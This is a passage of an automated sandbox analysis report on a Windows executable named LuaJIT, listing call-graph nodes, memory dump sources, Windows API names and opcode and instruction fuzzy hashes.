API calls 2 library calls 76493->76518 76494->76451 76500 7ff738a536b0 5 API calls 2 library calls 76494->76500 76496->76446 76497->76446 
76498->76446 76499->76446 76500->76451 76501->76463 76503 7ff738a8af50 7 API calls 76502->76503 76504 7ff738a8b13e 76503->76504 76504->76474 76506 7ff738a8af2e 76505->76506 76507 7ff738a8aefe 76505->76507 76506->76474 76508 7ff738a8ade0 VirtualProtect 76507->76508 76509 7ff738a8af20 76508->76509 76509->76506 76510 7ff738a8ae40 15 API calls 76509->76510 76510->76506 76511->76477 76512->76481 76514 7ff738a9b483 76513->76514 76515 7ff738a9b48d 76513->76515 76516 7ff738a9b410 18 API calls 76514->76516 76515->76485 76516->76515 76517->76490 76518->76494 76520 7ff738a8aee0 16 API calls 76519->76520 76521 7ff738a8aabe 76520->76521 76521->76456 76522->76458 76523->76455 76525 7ff738a3b3ed 76524->76525 76526 7ff738a48484 76524->76526 76528 7ff738a48420 76525->76528 76526->76525 76532 7ff738a4a690 76526->76532 76529 7ff738a48429 76528->76529 76530 7ff738a3b3f7 76529->76530 76543 7ff738a4a850 76529->76543 76530->76387 76533 7ff738a4a707 76532->76533 76538 7ff738a32f8a 76533->76538 76539 7ff738a32fab 76538->76539 76540 7ff738a3301d 76539->76540 76541 7ff738a50f90 strrchr 15 API calls 76539->76541 76542 7ff738a32420 76541->76542 76542->76542 76544 7ff738a4a888 76543->76544 76545 7ff738a4a8bd 76544->76545 76546 7ff738a4a9a3 wcsxfrm 76544->76546 76552 7ff738a4d720 15 API calls 2 library calls 76545->76552 76548 7ff738a4a690 15 API calls 76546->76548 76549 7ff738a4a99e 76546->76549 76548->76549 76549->76529 76550 7ff738a4a94c 76550->76549 76551 7ff738a4a690 15 API calls 76550->76551 76551->76549 76552->76550 76584 7ff738a577f0 76553->76584 76555 7ff738a577f0 _wcsupr_s 54 API calls 76562 7ff738a572d0 76555->76562 76556 7ff738a5731f 76558 7ff738a572f8 76556->76558 76589 7ff738a405a0 15 API calls 2 library calls 76556->76589 76558->76418 76560 7ff738a577f0 _wcsupr_s 54 API calls 76560->76562 76561 7ff738a5737f _wcsupr_s 76590 7ff738a40600 5 API calls _free_nolock 76561->76590 76562->76555 76562->76556 76562->76558 76563 7ff738a57315 76562->76563 76588 7ff738a578c0 54 API calls 
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000003.1933422509.00007FF734B00000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007FF734B00000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_3_7ff734b00000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: $n
                                                                                                                                                                        • API String ID: 0-2632856075
                                                                                                                                                                        • Opcode ID: 9527e5a5e1fa6b575878fa84c6c09e235472329cfb16bff1f4801811506577c5
                                                                                                                                                                        • Instruction ID: 1a661b3146963cb318271c50f424d93f68e0846f67dc5ead34ab88680f593ac9
                                                                                                                                                                        • Opcode Fuzzy Hash: 9527e5a5e1fa6b575878fa84c6c09e235472329cfb16bff1f4801811506577c5
                                                                                                                                                                        • Instruction Fuzzy Hash: F524A871814F0F9AD769DF2988886A0F3A0FF19325F948374C8AE9B5D1DB3464C2D792
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000003.1933422509.00007FF734B00000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007FF734B00000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_3_7ff734b00000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: J
                                                                                                                                                                        • API String ID: 0-1141589763
                                                                                                                                                                        • Opcode ID: a56e7a05caab9af9bf068028898b78e5ed4ec07128c54d202b5b68f81d8d36d5
                                                                                                                                                                        • Instruction ID: 45b21f8ab7585cb5df7accd9acbea775bf44091e5e1163f37a70ac5850fef2cc
                                                                                                                                                                        • Opcode Fuzzy Hash: a56e7a05caab9af9bf068028898b78e5ed4ec07128c54d202b5b68f81d8d36d5
                                                                                                                                                                        • Instruction Fuzzy Hash: EDF13830C18B4E96D71A9F358884AB1F3A0FF2A315F859379DC9E5A482DF3470C28297
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000003.1933422509.00007FF734B00000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007FF734B00000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_3_7ff734b00000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: _
                                                                                                                                                                        • API String ID: 0-701932520
                                                                                                                                                                        • Opcode ID: 06be1f57e193c88356635424a90a78936cff5563eb8ace873d1b39fd4965e912
                                                                                                                                                                        • Instruction ID: 035bae9b4656b3a1fd32e120ce4c06b89d05d89931a954a4d0b57930e240d94f
                                                                                                                                                                        • Opcode Fuzzy Hash: 06be1f57e193c88356635424a90a78936cff5563eb8ace873d1b39fd4965e912
                                                                                                                                                                        • Instruction Fuzzy Hash: FFF11A30C18B4E96D75A9F358884AB1F3A0FF2A315F559379EC9E5A482DF3470C28297
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000003.1933422509.00007FF734B00000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007FF734B00000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_3_7ff734b00000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 243365fc3f55dbf6dd4c3d443cb2882f805c55e91161abbe14cbf5fe0e3d673e
                                                                                                                                                                        • Instruction ID: 0ca46fd3932070ceec4497afc200fa255a9a73fbc6c6f789528f0ee113a9ae2d
                                                                                                                                                                        • Opcode Fuzzy Hash: 243365fc3f55dbf6dd4c3d443cb2882f805c55e91161abbe14cbf5fe0e3d673e
                                                                                                                                                                        • Instruction Fuzzy Hash: 2B222830C18B4E9AE75AAF358884AB5F3A0FF19315F848378DC8E960D1DB34B4C59297
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000003.1933422509.00007FF734B00000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007FF734B00000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_3_7ff734b00000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 682d52d32a565a0b11d60daadd7a1e94fdf04c2d47adb3038f292e7ea84cb7fb
                                                                                                                                                                        • Instruction ID: a96a16a3cfc234ed64a0f857543dd8c9bce758e065d2160198836590a36fd94b
                                                                                                                                                                        • Opcode Fuzzy Hash: 682d52d32a565a0b11d60daadd7a1e94fdf04c2d47adb3038f292e7ea84cb7fb
                                                                                                                                                                        • Instruction Fuzzy Hash: C722A770414F0B9AD799DF2884886A1F7A0FF19335F948378D4BE9B5D2DB3461C28786
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000003.1933422509.00007FF734B00000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007FF734B00000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_3_7ff734b00000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 830c3a2a2c4752547a286b6f6faf81b5940fbf09ec5c3ec2066a76b56cbf2f3b
                                                                                                                                                                        • Instruction ID: 96a6bc7829f02a8516bbbd7c11d2599cd7db0aeedc9db264ba10de0da7fc3444
                                                                                                                                                                        • Opcode Fuzzy Hash: 830c3a2a2c4752547a286b6f6faf81b5940fbf09ec5c3ec2066a76b56cbf2f3b
                                                                                                                                                                        • Instruction Fuzzy Hash: 7EF13930C18B0E96D75AAF3584C49B1F3A0FF1A305F959379DC8EAA085DB3474D29297
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000003.1933422509.00007FF734B00000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007FF734B00000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_3_7ff734b00000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: eb082c47524ef5d6c37e321d82e813628a3890c3b486fea592612210b3a1c369
                                                                                                                                                                        • Instruction ID: 66cf12effc5fd3dbdebb80621c51db1d9f166b5123b9503eda3ea06149020e9e
                                                                                                                                                                        • Opcode Fuzzy Hash: eb082c47524ef5d6c37e321d82e813628a3890c3b486fea592612210b3a1c369
                                                                                                                                                                        • Instruction Fuzzy Hash: 52024930C18F0E9AD75AAF398484AB5F3A0FF19315F849379E89E964D1DB3470C28697
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000003.1933422509.00007FF734B00000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007FF734B00000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_3_7ff734b00000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: b3a0dd1b469634fbe9c537d4ddbdceeee93b58cfac050f57a1ff281579d1c5a2
                                                                                                                                                                        • Instruction ID: 319a169cf6e837e97e9a1a29b5a24ef1d6c308c7d61791a95c85a2dc2f66aeef
                                                                                                                                                                        • Opcode Fuzzy Hash: b3a0dd1b469634fbe9c537d4ddbdceeee93b58cfac050f57a1ff281579d1c5a2
                                                                                                                                                                        • Instruction Fuzzy Hash: 2CE13A30C18B0E9AD75AAF3584C4AB5F3A1FF19305F859379D88EAA085DF3474C29297
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000003.1933422509.00007FF734B00000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007FF734B00000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_3_7ff734b00000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: b9f0d4f8930ef95fa3b3b5d0a1f51427cb5864c8b49b21f14109542709b76be5
                                                                                                                                                                        • Instruction ID: 55806bd38f19fc7c0bd4e304142ec016cc0f49e68167822169213a455658f7df
                                                                                                                                                                        • Opcode Fuzzy Hash: b9f0d4f8930ef95fa3b3b5d0a1f51427cb5864c8b49b21f14109542709b76be5
                                                                                                                                                                        • Instruction Fuzzy Hash: 3DE12830C18B0E96D75AAF3588C49B5B3A0FF19315F859379DC8E6A486DF3474C28297
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000003.1933422509.00007FF734B00000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007FF734B00000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_3_7ff734b00000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 2befca39d1b5830a71e6d253c93d82be84e898f0df5b0882a9919a2d68ca01c1
                                                                                                                                                                        • Instruction ID: 3b1ff1a68ff75104319edbed9afc63e2c12216cd1c3c1c886ee1e50fd63fe268
                                                                                                                                                                        • Opcode Fuzzy Hash: 2befca39d1b5830a71e6d253c93d82be84e898f0df5b0882a9919a2d68ca01c1
                                                                                                                                                                        • Instruction Fuzzy Hash: 05E11730C18B0E96D75AAF3584C49B5F3A0FF29315F859379EC8E6A486DB3474C28297
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000003.1933422509.00007FF734B00000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007FF734B00000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_3_7ff734b00000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 44d6c9b764d39dcde219d4c8901edccfbe23e100efe6fef57b3d3918a6cb70fe
                                                                                                                                                                        • Instruction ID: d132e5afd1eda01f6b4f59fe412c360b92dea25c564d2cb285b597ff219237da
                                                                                                                                                                        • Opcode Fuzzy Hash: 44d6c9b764d39dcde219d4c8901edccfbe23e100efe6fef57b3d3918a6cb70fe
                                                                                                                                                                        • Instruction Fuzzy Hash: 9BE12A30C18B0E56D75AAF3584C49B5B3A0FF19305F859379EC8E6A086DF3474D68297
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000003.1933422509.00007FF734B00000.00000020.00001000.00020000.00000000.sdmp, Offset: 00007FF734B00000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_3_7ff734b00000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: cf58da845510f8d2f0a24c94611b49bfb822de0e522ae078ac23593eeee7cf45
                                                                                                                                                                        • Instruction ID: 35a48df5a61f378ac0129de7055b813d8e1906d98d137aac32edc2e28bab66c6
                                                                                                                                                                        • Opcode Fuzzy Hash: cf58da845510f8d2f0a24c94611b49bfb822de0e522ae078ac23593eeee7cf45
                                                                                                                                                                        • Instruction Fuzzy Hash: 29D12830C18B0E9AD75AAF3584C49B5B3A1FF19305F859379EC8EA6086DF3474C68297
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000002.1937269519.00007FF738A31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                                                                                                                                        • Associated: 00000009.00000002.1937252453.00007FF738A30000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937462311.00007FF738B21000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937504646.00007FF738B3F000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937538221.00007FF738B40000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937577298.00007FF738B42000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937595379.00007FF738B45000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff738a30000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type_get_daylight
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1330151763-0
                                                                                                                                                                        • Opcode ID: 9c6babcf131964b4a709adb186eeeb7abad8bdca1f25803fa6700e53adfe3286
                                                                                                                                                                        • Instruction ID: fae657366cf6ce9a0ffc4c86a90764217059809a0d650056a525940c66e7f05f
                                                                                                                                                                        • Opcode Fuzzy Hash: 9c6babcf131964b4a709adb186eeeb7abad8bdca1f25803fa6700e53adfe3286
                                                                                                                                                                        • Instruction Fuzzy Hash: 62C10437B24A4695EB10DF68C4805ADB771FB48B98B901325DE2E8B7D4CF3AE051D315
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        APIs
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000002.1937269519.00007FF738A31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                                                                                                                                        • Associated: 00000009.00000002.1937252453.00007FF738A30000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937462311.00007FF738B21000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937504646.00007FF738B3F000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937538221.00007FF738B40000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937577298.00007FF738B42000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937595379.00007FF738B45000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff738a30000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: _invalid_parameter_noinfo
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 3215553584-0
                                                                                                                                                                        • Opcode ID: cba73ceef4245a3387785af76a2bd29b1685e99a0e17626f03ba81314b1aa7ff
                                                                                                                                                                        • Instruction ID: 0af694e1b1bde08217c4d5e033311ae7c132f76671a366e67c6597a9509e11d9
                                                                                                                                                                        • Opcode Fuzzy Hash: cba73ceef4245a3387785af76a2bd29b1685e99a0e17626f03ba81314b1aa7ff
                                                                                                                                                                        • Instruction Fuzzy Hash: 34C102A3A0C687A1EA606B159400ABDEB50FB81B80FC40131EA6D07791DF7EF445E72B
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        APIs
                                                                                                                                                                        • _invalid_parameter_noinfo.LIBCMT ref: 00007FF738B0CE26
                                                                                                                                                                        • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,FFFFFFFE,?,?,00007FF738B0CDA3,?,?,FFFFFFFE,00007FF738B0D196), ref: 00007FF738B0CEE4
                                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,FFFFFFFE,?,?,00007FF738B0CDA3,?,?,FFFFFFFE,00007FF738B0D196), ref: 00007FF738B0CF6E
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000002.1937269519.00007FF738A31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                                                                                                                                        • Associated: 00000009.00000002.1937252453.00007FF738A30000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937462311.00007FF738B21000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937504646.00007FF738B3F000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937538221.00007FF738B40000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937577298.00007FF738B42000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937595379.00007FF738B45000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff738a30000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ConsoleErrorLastMode_invalid_parameter_noinfo
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 2210144848-0
                                                                                                                                                                        • Opcode ID: 40fda585d9d5e5497b1d355301c849312dfd192a2488e1c330e367bd86c0f89a
                                                                                                                                                                        • Instruction ID: 3b2a4c53e52454f98a0ab614d7c0a6b13e13b102f01b5a0dae5c1e841268646f
                                                                                                                                                                        • Opcode Fuzzy Hash: 40fda585d9d5e5497b1d355301c849312dfd192a2488e1c330e367bd86c0f89a
                                                                                                                                                                        • Instruction Fuzzy Hash: 3F81B563E19613A9F710BB648850ABCE761BB44B84FD40131DE2E53791DF3AA445E33B
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000002.1937269519.00007FF738A31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                                                                                                                                        • Associated: 00000009.00000002.1937252453.00007FF738A30000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937462311.00007FF738B21000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937504646.00007FF738B3F000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937538221.00007FF738B40000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937577298.00007FF738B42000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937595379.00007FF738B45000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff738a30000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: strrchr
                                                                                                                                                                        • String ID: d
                                                                                                                                                                        • API String ID: 3418686817-2564639436
                                                                                                                                                                        • Opcode ID: d48147831702bd7bd43eec79edb916d25b6cc89b023425ac0650d085df72b790
                                                                                                                                                                        • Instruction ID: 05a8b3556f82e96ddd9d2c6fdcd697d111f98cc9be8649de6cea20a8d5707063
                                                                                                                                                                        • Opcode Fuzzy Hash: d48147831702bd7bd43eec79edb916d25b6cc89b023425ac0650d085df72b790
                                                                                                                                                                        • Instruction Fuzzy Hash: A191AC2360DB8592DA609B15E04036AF760F7C4BA0F549232EAEE83BE9CF3DD044DB10
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000002.1937269519.00007FF738A31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                                                                                                                                        • Associated: 00000009.00000002.1937252453.00007FF738A30000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937462311.00007FF738B21000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937504646.00007FF738B3F000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937538221.00007FF738B40000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937577298.00007FF738B42000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937595379.00007FF738B45000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff738a30000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: String$try_get_function
                                                                                                                                                                        • String ID: LCMapStringEx
                                                                                                                                                                        • API String ID: 1203122356-3893581201
                                                                                                                                                                        • Opcode ID: a49e8d677765019be073db7e119ac0e4e27bb882df4160a7a626eb2ebf4a7855
                                                                                                                                                                        • Instruction ID: 5655e7fa6bb0c16f8d2fea9ffa2affb68e506bdc57f98d340e4f7ae1483bcad1
                                                                                                                                                                        • Opcode Fuzzy Hash: a49e8d677765019be073db7e119ac0e4e27bb882df4160a7a626eb2ebf4a7855
                                                                                                                                                                        • Instruction Fuzzy Hash: 96116D32A08BC296D760DB56F4802AAF7A0FBC9B80F544136EE8D83B59CF3DD4448B45
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        APIs
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000002.1937269519.00007FF738A31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                                                                                                                                        • Associated: 00000009.00000002.1937252453.00007FF738A30000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937462311.00007FF738B21000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937504646.00007FF738B3F000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937538221.00007FF738B40000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937577298.00007FF738B42000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937595379.00007FF738B45000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_9_2_7ff738a30000_LuaJIT.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: AddressCallerLibraryLoadProc
                                                                                                                                                                        • String ID: SystemFunction036$advapi32.dll
                                                                                                                                                                        • API String ID: 4215043672-1354007664
                                                                                                                                                                        • Opcode ID: 30b2f73f96f1acc817fbc38871702d57f699fdefbd6e4a561c2ccd7f055b506f
                                                                                                                                                                        • Instruction ID: 72ce38fcd703cd5e9167286ecb13e70cb6d3026a7a3cfbb50d33353b4d2950ff
                                                                                                                                                                        • Opcode Fuzzy Hash: 30b2f73f96f1acc817fbc38871702d57f699fdefbd6e4a561c2ccd7f055b506f
                                                                                                                                                                        • Instruction Fuzzy Hash: 93113363D1EA97E1E790BB10E445736E3A0FBC4350FD40231D98E422A5DF3EE495A639
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        APIs
                                                                                                                                                                        • GetLastError.KERNEL32(?,?,?,?,?,?,00007FF738ABEDD3), ref: 00007FF738ABF013
                                                                                                                                                                        • LoadLibraryExA.KERNEL32(?,?,?,?,?,?,00007FF738ABEDD3), ref: 00007FF738ABF034
                                                                                                                                                                        • SetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF738A817E7), ref: 00007FF738ABF061
                                                                                                                                                                          • Part of subcall function 00007FF738ABEE80: GetLastError.KERNEL32 ref: 00007FF738ABEE96
                                                                                                                                                                          • Part of subcall function 00007FF738ABEE80: FormatMessageA.KERNEL32 ref: 00007FF738ABEECA
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000009.00000002.1937269519.00007FF738A31000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF738A30000, based on PE: true
                                                                                                                                                                        • Associated: 00000009.00000002.1937252453.00007FF738A30000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937462311.00007FF738B21000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937504646.00007FF738B3F000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937538221.00007FF738B40000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937577298.00007FF738B42000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                        • Associated: 00000009.00000002.1937595379.00007FF738B45000.00000002.00000001.01000000.00000005.sdmp
